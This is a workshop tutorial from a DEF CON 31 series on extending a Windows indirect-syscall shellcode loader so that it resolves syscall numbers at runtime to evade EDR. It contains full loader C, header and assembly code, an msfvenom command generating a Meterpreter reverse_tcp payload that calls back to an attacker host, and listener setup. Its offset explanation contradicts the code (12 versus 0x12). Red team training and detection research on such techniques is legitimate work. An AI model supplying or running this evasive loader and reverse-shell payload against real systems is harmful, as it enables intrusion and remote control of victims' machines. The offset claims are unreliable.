Previous

Indirect syscalls and dynamic SSN retrieval via APIs

In this three-part blog post series, I’m publicly sharing the bonus material from my DEF CON 31 workshop. This content is designed to help you deepen your understanding of (in)direct syscalls, enhance your custom shellcode loader, and progressively implement both the Hell's Gate and Halos Gate techniques. By doing so, you will strengthen your skills in malware development, debugging, and EPP/EDR evasion.

Important: Before diving into the bonus chapters, I highly recommend reviewing all chapters of the main workshop material. The bonus content builds upon those foundations and assumes familiarity with key concepts introduced earlier.

In this first post, we’ll focus on extending the indirect syscall shellcode loader introduced in Chapter 7 of the main workshop. You’ll learn how to replace hardcoded syscall numbers (SSNs) with dynamically resolved SSNs at runtime using API-based techniques—an essential step toward making your loader more robust and stealthy in modern detection environments.

LAB Exercise: Dynamic SSN retrieval via APIs

In the first bonus chapter, we aim to enhance our indirect syscall loader. So far, our loader has had a key limitation: it only functions correctly on the specific Windows version used to extract and hardcode the System Service Numbers (SSNs) for the native functions NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx, and NtWaitForSingleObject.

Why is this a problem?
To grasp the fundamentals of direct and indirect syscalls, we initially hardcoded SSNs into our assembly resource file. However, during red team operations, we typically don't know the exact Windows version running on a target system. As a result, relying on hardcoded SSNs makes our loader brittle and limits its operational scope.

To address this, our goal is to make the loader more dynamic and version-agnostic by retrieving the SSNs at runtime from ntdll.dll.

In this tutorial, we’ll achieve this dynamic SSN resolution using two familiar Windows APIs: GetModuleHandleA and GetProcAddress. You’ve already encountered these functions earlier when we used them to locate the address of the syscall instruction within a syscall stub. Now, we'll extend their use to dynamically locate the SSNs for the native functions referenced in our code.

The template code used in this tutorial is available here.

Shellcode Loader Coding 

As mentioned earlier, I strongly recommend completing Chapter 7 of the main course before proceeding. That foundational knowledge is essential, as this chapter builds upon it by extending the indirect syscall loader to retrieve System Service Numbers (SSNs) dynamically at runtime—eliminating the need to hardcode them.

Syscall and Return Flow

The goal is to execute the syscall and ret instructions from within the syscall stubs of the native functions in memory, specifically from ntdll.dll. This requires us to redirect execution from our loader to the appropriate syscall instruction in ntdll.dll at runtime.

To achieve this, the indirect syscall loader must:

  1. Prepare the CPU registers (mov r10, rcx and mov eax, SSN),

  2. Then jump to the correct syscall stub in memory using:

This redirection is handled via Windows API calls and structured as follows:

Required Steps Using Windows APIs

  1. Retrieve a handle to ntdll.dll at runtime using GetModuleHandleA.

  2. Use GetProcAddress to resolve the address of each target native function (such as NtAllocateVirtualMemory).

  3. Calculate the exact address of the syscall instruction within each function’s syscall stub by applying a known offset, then store it in a global function pointer for later use.

Handle to ntdll.dll

The first step is to acquire a module handle to ntdll.dll using GetModuleHandleA. This handle will be required to resolve function addresses. The code below is already part of the indirect syscall proof-of-concept:

// Get a handle to the ntdll.dll library
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    if (hNtdll == NULL) {
        // Handle the error, for example, print an error message and return.
        printf("Error: the specified module could not be found.");
        return 1; // Or any other non-zero value, since typically a zero return indicates success
    }

This allows you to query the base address of the ntdll.dll, which is necessary to dynamically resolve further offsets and addresses at runtime.

Start Address Native Function

Next, we use the following code to retrieve the start address of the target native function from the memory of ntdll.dll using the GetProcAddress function. The returned address is stored in a variable declared as a function pointer, which we will later use to calculate the location of the syscall instruction within the syscall stub.

Task

In the indirect syscall proof-of-concept (PoC), this code is implemented only for the native function NtAllocateVirtualMemory. Workshop attendees are expected to extend the implementation by following the same code pattern for the other native functions. The code scheme for NtAllocateVirtualMemory, shown in the section below, serves as a template for resolving and handling additional system calls such as NtWriteVirtualMemory, NtCreateThreadEx, and NtWaitForSingleObject.

// Declare and initialize a pointer to the NtAllocateVirtualMemory function and get the address of the NtAllocateVirtualMemory function in the ntdll.dll module
    UINT_PTR pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");

If you were unable to complete this section on your own, you can find the full code solution provided below for reference.

// Declare and initialize a pointer to the NtAllocateVirtualMemory function and get the address of the NtAllocateVirtualMemory function in the ntdll.dll module
    UINT_PTR pNtAllocateVirtualMemory = (UINT_PTR)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");
    UINT_PTR pNtWriteVirtualMemory = (UINT_PTR)GetProcAddress(hNtdll, "NtWriteVirtualMemory");
    UINT_PTR pNtCreateThreadEx = (UINT_PTR)GetProcAddress(hNtdll, "NtCreateThreadEx");
    UINT_PTR pNtWaitForSingleObject = (UINT_PTR)GetProcAddress(hNtdll, "NtWaitForSingleObject");

Memory Address Syscall Instruction

In the next step, we want to calculate the effective memory address of the syscall instruction within the syscall stub of the native function. To do this, we add a fixed offset to the start address of the function, which we retrieved in the previous step using GetProcAddress. Specifically, we add an offset of 12 bytes.

Why exactly 12 bytes? This offset corresponds to the distance from the beginning of the native function to the actual syscall instruction within its stub. This value is based on the standard layout of syscall stubs in ntdll.dll on modern Windows systems, where the first few instructions typically involve stack setup and register moves, followed by the mov r10, rcx and mov eax, SSN instructions.

With the offset of 12 bytes, we deliberately jump to the mov r10, rcx instruction — the entry point we need for our indirect syscall invocation.

Task

In the indirect syscall proof-of-concept (PoC), this logic is implemented only for the native function NtAllocateVirtualMemory. It is the responsibility of the workshop attendee to extend this implementation to the remaining native functions by following the same code pattern. The reference implementation for NtAllocateVirtualMemory is shown in the code section below and should be used as a template for functions such as NtWriteVirtualMemory, NtCreateThreadEx, and NtWaitForSingleObject.

// The syscall stub (actual system call instruction) is some bytes further into the function. 
    // In this case, it's assumed to be 0x12 (18 in decimal) bytes from the start of the function.
    // So we add 0x12 to the function's address to get the address of the system call instruction.
    sysAddrNtAllocateVirtualMemory = pNtAllocateVirtualMemory + 0x12;

If you were unable to complete this section on your own, you can find the full code solution provided below for reference.

// The syscall stub (actual system call instruction) is some bytes further into the function. 
    // In this case, it's assumed to be 0x12 (18 in decimal) bytes from the start of the function.
    // So we add 0x12 to the function's address to get the address of the system call instruction.
    sysAddrNtAllocateVirtualMemory = pNtAllocateVirtualMemory + 0x12;
    sysAddrNtWriteVirtualMemory = pNtWriteVirtualMemory + 0x12;
    sysAddrNtCreateThreadEx = pNtCreateThreadEx + 0x12;
    sysAddrNtWaitForSingleObject = pNtWaitForSingleObject + 0x12;

GetProcAddress - System Service Number (SSN)

In the next step, we want to calculate the effective memory address of the System Service Number (SSN) within the syscall stub of the native function. To do this, we add an offset of 4 bytes to the function’s start address, which we previously resolved using GetProcAddress.

Why 4 bytes?
This offset corresponds to the position of the mov eax, <SSN> instruction within the syscall stub. In the typical structure of syscall stubs in ntdll.dll, the SSN value is loaded into the eax register as a 4-byte immediate value — and this instruction is usually located 4 bytes after the function’s entry point.

By jumping precisely to this location, we can extract the SSN value from the machine code at runtime and use it dynamically in the loader — without relying on hardcoded values.

Task

The following code demonstrates the concept in the context of the native function NtAllocateVirtualMemory. Workshop attendees are expected to apply the same approach to implement the logic for the remaining native functions: NtWriteVirtualMemory, NtCreateThreadEx, and NtWaitForSingleObject.

// Here we're retrieving the system call number for each function. The syscall number is used to identify the syscall when the program uses the syscall instruction.
    // It's assumed that the syscall number is located 4 bytes into the function.
    wNtAllocateVirtualMemory = ((unsigned char*)(pNtAllocateVirtualMemory + 4))[0];

If you were unable to complete this section on your own, you can refer to the full code solution provided below.

// Here we're retrieving the system call number for each function. The syscall number is used to identify the syscall when the program uses the syscall instruction.
    // It's assumed that the syscall number is located 4 bytes into the function.
    wNtAllocateVirtualMemory = ((unsigned char*)(pNtAllocateVirtualMemory + 4))[0];
    wNtWriteVirtualMemory = ((unsigned char*)(pNtWriteVirtualMemory + 4))[0];
    wNtCreateThreadEx = ((unsigned char*)(pNtCreateThreadEx + 4))[0];
    wNtWaitForSingleObject = ((unsigned char*)(pNtWaitForSingleObject + 4))[0];

Global Variables

To store the memory address of the syscall instruction for each native function, and to make this address accessible later within the assembly code in the syscalls.asm file, we declare a global variable for each syscall address. Each of these variables is declared as a pointer to hold the corresponding memory address.

Task

As in the previous steps, this code in the proof-of-concept (PoC) for indirect syscalls has so far only been implemented for the native function NtAllocateVirtualMemory.

Workshop participants are expected to implement support for the remaining functions on their own — using the same code structure that is demonstrated in the following section for NtAllocateVirtualMemory.

// Declare global variables to hold the syscall instruction addresses
UINT_PTR sysAddrNtAllocateVirtualMemory;

If you were unable to complete this section on your own, you can refer to the full code solution provided below.

// Declare global variables to hold the syscall instruction addresses
UINT_PTR sysAddrNtAllocateVirtualMemory;
UINT_PTR sysAddrNtWriteVirtualMemory;
UINT_PTR sysAddrNtCreateThreadEx;
UINT_PTR sysAddrNtWaitForSingleObject;

To store the memory address of the system service number (SSN) for each native function—and to later provide this address to the assembly code in the syscalls.asm file—we declare a global variable for each SSN. Each of these variables is defined as a DWORD, since the SSN is a 4-byte value.

Task

Once again, based on the following code example—which demonstrates the concept using the native function NtAllocateVirtualMemory—the workshop attendee is expected to complete the implementation for the remaining native functions: NtWriteVirtualMemory, NtCreateThreadEx, and NtWaitForSingleObject.

// Global DWORD (double words) that will hold the SSN
DWORD wNtAllocateVirtualMemory;

If you were unable to complete this section, the full code solution is provided below for your reference.

// Declare global variables to hold the syscall instruction addresses
DWORD wNtAllocateVirtualMemory;
DWORD wNtWriteVirtualMemory;
DWORD wNtCreateThreadEx;
DWORD wNtWaitForSingleObject;

Header File

As with the direct syscall loader, we no longer rely on ntdll.dll to provide the function definitions for the native APIs we are using. However, since we still need to call these native functions, we must define their prototypes manually. To maintain clean and reusable code, we define the function signatures for all four native functions in a dedicated header file. In this case, the header file should be named syscalls.h.

Task

The syscalls.h file is not currently present in the syscall proof-of-concept (PoC) folder. Your task is to create a new header file named syscalls.h and implement the required function definitions within it. The necessary code for this header file is provided in the code section below.

Once created, you will need to include syscalls.h in the main source file to ensure the function prototypes are available during compilation.

If you wish to verify or explore the native function definitions manually, you can refer to the official Microsoft documentation. For example, the prototype for NtAllocateVirtualMemory can be found in the Windows API reference.

#ifndef _SYSCALLS_H  // If _SYSCALLS_H is not defined then define it and the contents below. This is to prevent double inclusion.
#define _SYSCALLS_H  // Define _SYSCALLS_H

#include <windows.h>  // Include the Windows API header

// The type NTSTATUS is typically defined in the Windows headers as a long.
typedef long NTSTATUS;  // Define NTSTATUS as a long
typedef NTSTATUS* PNTSTATUS;  // Define a pointer to NTSTATUS

// Declare the function prototype for NtAllocateVirtualMemory
extern NTSTATUS NtAllocateVirtualMemory(
    HANDLE ProcessHandle,    // Handle to the process in which to allocate the memory
    PVOID* BaseAddress,      // Pointer to the base address
    ULONG_PTR ZeroBits,      // Number of high-order address bits that must be zero in the base address of the section view
    PSIZE_T RegionSize,      // Pointer to the size of the region
    ULONG AllocationType,    // Type of allocation
    ULONG Protect            // Memory protection for the region of pages
);

// Declare the function prototype for NtWriteVirtualMemory
extern NTSTATUS NtWriteVirtualMemory(
    HANDLE ProcessHandle,     // Handle to the process in which to write the memory
    PVOID BaseAddress,        // Pointer to the base address
    PVOID Buffer,             // Buffer containing data to be written
    SIZE_T NumberOfBytesToWrite, // Number of bytes to be written
    PULONG NumberOfBytesWritten // Pointer to the variable that receives the number of bytes written
);

// Declare the function prototype for NtCreateThreadEx
extern NTSTATUS NtCreateThreadEx(
    PHANDLE ThreadHandle,        // Pointer to a variable that receives a handle to the new thread
    ACCESS_MASK DesiredAccess,   // Desired access to the thread
    PVOID ObjectAttributes,      // Pointer to an OBJECT_ATTRIBUTES structure that specifies the object's attributes
    HANDLE ProcessHandle,        // Handle to the process in which the thread is to be created
    PVOID lpStartAddress,        // Pointer to the application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread
    PVOID lpParameter,           // Pointer to a variable to be passed to the thread
    ULONG Flags,                 // Flags that control the creation of the thread
    SIZE_T StackZeroBits,        // A pointer to a variable that specifies the number of high-order address bits that must be zero in the stack pointer
    SIZE_T SizeOfStackCommit,    // The size of the stack that must be committed at thread creation
    SIZE_T SizeOfStackReserve,   // The size of the stack that must be reserved at thread creation
    PVOID lpBytesBuffer          // Pointer to a variable that receives any output data from the system
);

// Declare the function prototype for NtWaitForSingleObject
extern NTSTATUS NtWaitForSingleObject(
    HANDLE Handle,          // Handle to the object to be waited on
    BOOLEAN Alertable,      // If set to TRUE, the function returns when the system queues an I/O completion routine or APC for the thread
    PLARGE_INTEGER Timeout  // Pointer to a LARGE_INTEGER that specifies the absolute or relative time at which the function should return, regardless of the state of the object
);

#endif // _SYSCALLS_H  // End of the _SYSCALLS_H definition

Assembly Instructions

As before, we do not want to rely on ntdll.dll to provide the syscall stub at runtime. Instead, we replace the previously hardcoded system service number (SSN) with the corresponding variable that dynamically holds the SSN for each native function.

The following code demonstrates this concept using the native function NtAllocateVirtualMemory. Workshop attendees are expected to follow the same approach and complete the implementation for the remaining functions: NtWriteVirtualMemory, NtCreateThreadEx, and NtWaitForSingleObject.

EXTERN wNtAllocateVirtualMemory:DWORD               ; Holds the dynamic retrieved SSN for NtAllocateVirtualMemory 
  EXTERN sysAddrNtAllocateVirtualMemory:QWORD         ; Holds the actual address of the NtAllocateVirtualMemory syscall in ntdll.dll.
     
.CODE  ; Start the code section

; Procedure for the NtAllocateVirtualMemory syscall
NtAllocateVirtualMemory PROC
    mov r10, rcx                                    ; Move the contents of rcx to r10. This is necessary because the syscall instruction in 64-bit Windows expects the parameters to be in the r10 and rdx registers.
    mov eax, wNtAllocateVirtualMemory               ; Move the syscall number into the eax register.
    jmp QWORD PTR [sysAddrNtAllocateVirtualMemory]  ; Jump to the actual syscall.
NtAllocateVirtualMemory ENDP                     	; End of the procedure.     
     
END  ; End of the module

Task

Your task is to add the syscalls.asm file to the indirect syscall loader project as a resource (existing item), and then complete both the assembly code and the corresponding C code for the remaining three native APIs: NtWriteVirtualMemory, NtCreateThreadEx, and NtWaitForSingleObject.

If you are unable to complete the assembly code yourself at this time, you can refer to the solution provided and copy the relevant assembly routines from the syscalls.asm file used in the direct syscall loader proof-of-concept (PoC). Paste the required functions into the syscalls.asm file of the indirect loader project to proceed.

EXTERN wNtAllocateVirtualMemory:DWORD               ; Holds the dynamic retrieved SSN for NtAllocateVirtualMemory
EXTERN wNtWriteVirtualMemory:DWORD                  ; Holds the dynamic retrieved SSN for NtWriteVirtualMemory
EXTERN wNtCreateThreadEx:DWORD                      ; Holds the dynamic retrieved SSN for NtCreateThreadEx
EXTERN wNtWaitForSingleObject:DWORD                 ; Holds the dynamic retrieved SSN for NtWaitForSingleObject

EXTERN sysAddrNtAllocateVirtualMemory:QWORD         ; The actual address of the NtAllocateVirtualMemory syscall in ntdll.dll.
EXTERN sysAddrNtWriteVirtualMemory:QWORD            ; The actual address of the NtWriteVirtualMemory syscall in ntdll.dll.
EXTERN sysAddrNtCreateThreadEx:QWORD                ; The actual address of the NtCreateThreadEx syscall in ntdll.dll.
EXTERN sysAddrNtWaitForSingleObject:QWORD           ; The actual address of the NtWaitForSingleObject syscall in ntdll.dll.


.CODE  ; Start the code section

; Procedure for the NtAllocateVirtualMemory syscall
NtAllocateVirtualMemory PROC
    mov r10, rcx                                    ; Move the contents of rcx to r10. This is necessary because the syscall instruction in 64-bit Windows expects the parameters to be in the r10 and rdx registers.
    mov eax, wNtAllocateVirtualMemory               ; Move the syscall number into the eax register.
    jmp QWORD PTR [sysAddrNtAllocateVirtualMemory]  ; Jump to the actual syscall.
NtAllocateVirtualMemory ENDP                     	  ; End of the procedure.


; Similar procedures for NtWriteVirtualMemory syscalls
NtWriteVirtualMemory PROC
    mov r10, rcx
    mov eax, wNtWriteVirtualMemory
    jmp QWORD PTR [sysAddrNtWriteVirtualMemory]
NtWriteVirtualMemory ENDP


; Similar procedures for NtCreateThreadEx syscalls
NtCreateThreadEx PROC
    mov r10, rcx
    mov eax, wNtCreateThreadEx
    jmp QWORD PTR [sysAddrNtCreateThreadEx]
NtCreateThreadEx ENDP


; Similar procedures for NtWaitForSingleObject syscalls
NtWaitForSingleObject PROC
    mov r10, rcx
    mov eax, wNtWaitForSingleObject
    jmp QWORD PTR [sysAddrNtWaitForSingleObject]
NtWaitForSingleObject ENDP

END  ; End of the module

Microsoft Macro Assembler (MASM)

The necessary assembly routines have already been implemented in the syscalls.asm file. However, to ensure this code is correctly interpreted and integrated within the direct syscall proof-of-concept (PoC), a few additional steps must be performed. These steps are not included in the downloadable PoC by default and must be completed manually by the student.

Task

First, you need to enable support for the Microsoft Macro Assembler (MASM) in the Visual Studio project. This can be done by navigating to Build Dependencies > Build Customizations and checking the option for masm (.asm) to ensure that assembly files are correctly compiled and linked during the build process.

Task

Next, you need to set the item type of the syscalls.asm file to Microsoft Macro Assembler. If this is not configured correctly, Visual Studio will not compile the assembly file, resulting in unresolved symbol errors for the native API stubs used in the direct syscall loader.

Additionally, ensure that the Excluded From Build property is set to No, and the Content property is set to Yes. This ensures the file is included in the build process and properly embedded or referenced as needed.

Meterpreter Shellcode

Task

We generate our Meterpreter shellcode using msfvenom on Kali Linux. For this example, we will create a staged Meterpreter shellcode targeting x64 architecture using the following command.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IPv4_Redirector_or_IPv4_Kali LPORT=80 -f c > /tmp/shellcode.txt

The generated shellcode can then be inserted into the direct syscall loader proof-of-concept (PoC) by replacing the existing placeholder defined as an unsigned char array. After making this change, the PoC should be compiled as an x64 Release build to ensure compatibility with the 64-bit shellcode.

MSF-Listener

Task

Before testing the functionality of the direct syscall loader, we need to set up a listener in msfconsole to handle the incoming Meterpreter session.

msf> use exploit/multi/handler
msf> set payload windows/x64/meterpreter/reverse_tcp
msf> set lhost IPv4_Redirector_or_IPv4_Kali
msf> set lport 80 
msf> set exitonsession false
msf> run

Once the listener has been successfully started, you can execute the compiled direct syscall loader. If everything is configured correctly, you should receive an incoming command and control session in msfconsole.

Shellcode Loader Analysis

The first step is to execute your direct syscall loader and verify that the .exe is running and that a stable Meterpreter command and control (C2) session has been established. Once confirmed, open x64dbg and attach it to the running process.

Note: If you choose to open the direct syscall loader directly in x64dbg (instead of attaching to a running instance), you must manually start the program execution by running the initial assembly instructions to reach the point where the loader is active.

Task

Now we want to analyze the loader’s behavior using x64dbg and compare the results with the variant that uses hardcoded System Service Numbers (SSNs).

What differences should we expect?

The first immediately noticeable difference is the use of global variables:
In the indirect syscall loader, additional global variables are present to hold the dynamically retrieved SSNs at runtime. These variables are typically stored in the .data or .rdata segment and are clearly visible in the debugger — either as readable DWORD values or as references in a wrapper function.

In contrast, the hardcoded variant embeds the SSNs directly in the assembly instructions. For example, you will typically see a mov eax, <SSN> instruction with a constant immediate value right before the syscall instruction. There are no global memory locations from which the SSN is loaded — it is a fixed part of the machine code and can be directly observed during disassembly.


We can also observe that the SSNs are no longer hardcoded into the assembly. Instead, they are dynamically retrieved at runtime by resolving the start address of each native function using GetProcAddress and then adding the required 4-byte offset to locate the SSN within the syscall stub.

Additionally, you will notice the presence of global variables—typically prefixed with w*—which are used to store the dynamically retrieved SSNs. These variables play a central role in making the loader version-independent and more flexible compared to the static, hardcoded approach.

Summary

We transitioned from using hardcoded system service numbers (SSNs) to dynamically retrieving them at runtime via GetProcAddress. These dynamically resolved SSNs are stored in globally declared variables, allowing us to reference them flexibly throughout the loader.

This dynamic approach provides significantly greater flexibility when targeting different versions of Windows, as it eliminates the dependency on fixed SSN values that vary across builds and updates of the operating system.

Limitations

Depending on the EDR in place, this approach may not always be effective. If functions like GetModuleHandleA and GetProcAddress are hooked, dynamic SSN retrieval can be detected or blocked. This introduces a classic chicken-and-egg problem: while we use direct or indirect syscalls to bypass user-mode hooks, the mechanism we rely on to retrieve SSNs—namely, these same API functions—may already be compromised. To address this challenge, we explore alternative techniques in the next bonus chapter.

If you’re interested in further enhancing your (in)direct syscall shellcode loader by dynamically retrieving SSNs without relying on potentially hooked Windows APIs, refer to Bonus Chapter 2 from the DEF CON 31 workshop. There, we demonstrate how to use a combination of PEB walking and Export Address Table (EAT) parsing to extract the required information directly from memory.

Happy Hacking!

Daniel Feichter @VirtualAllocEx

Last updated 23.05.25 08:47:28 23.05.25
Daniel Feichter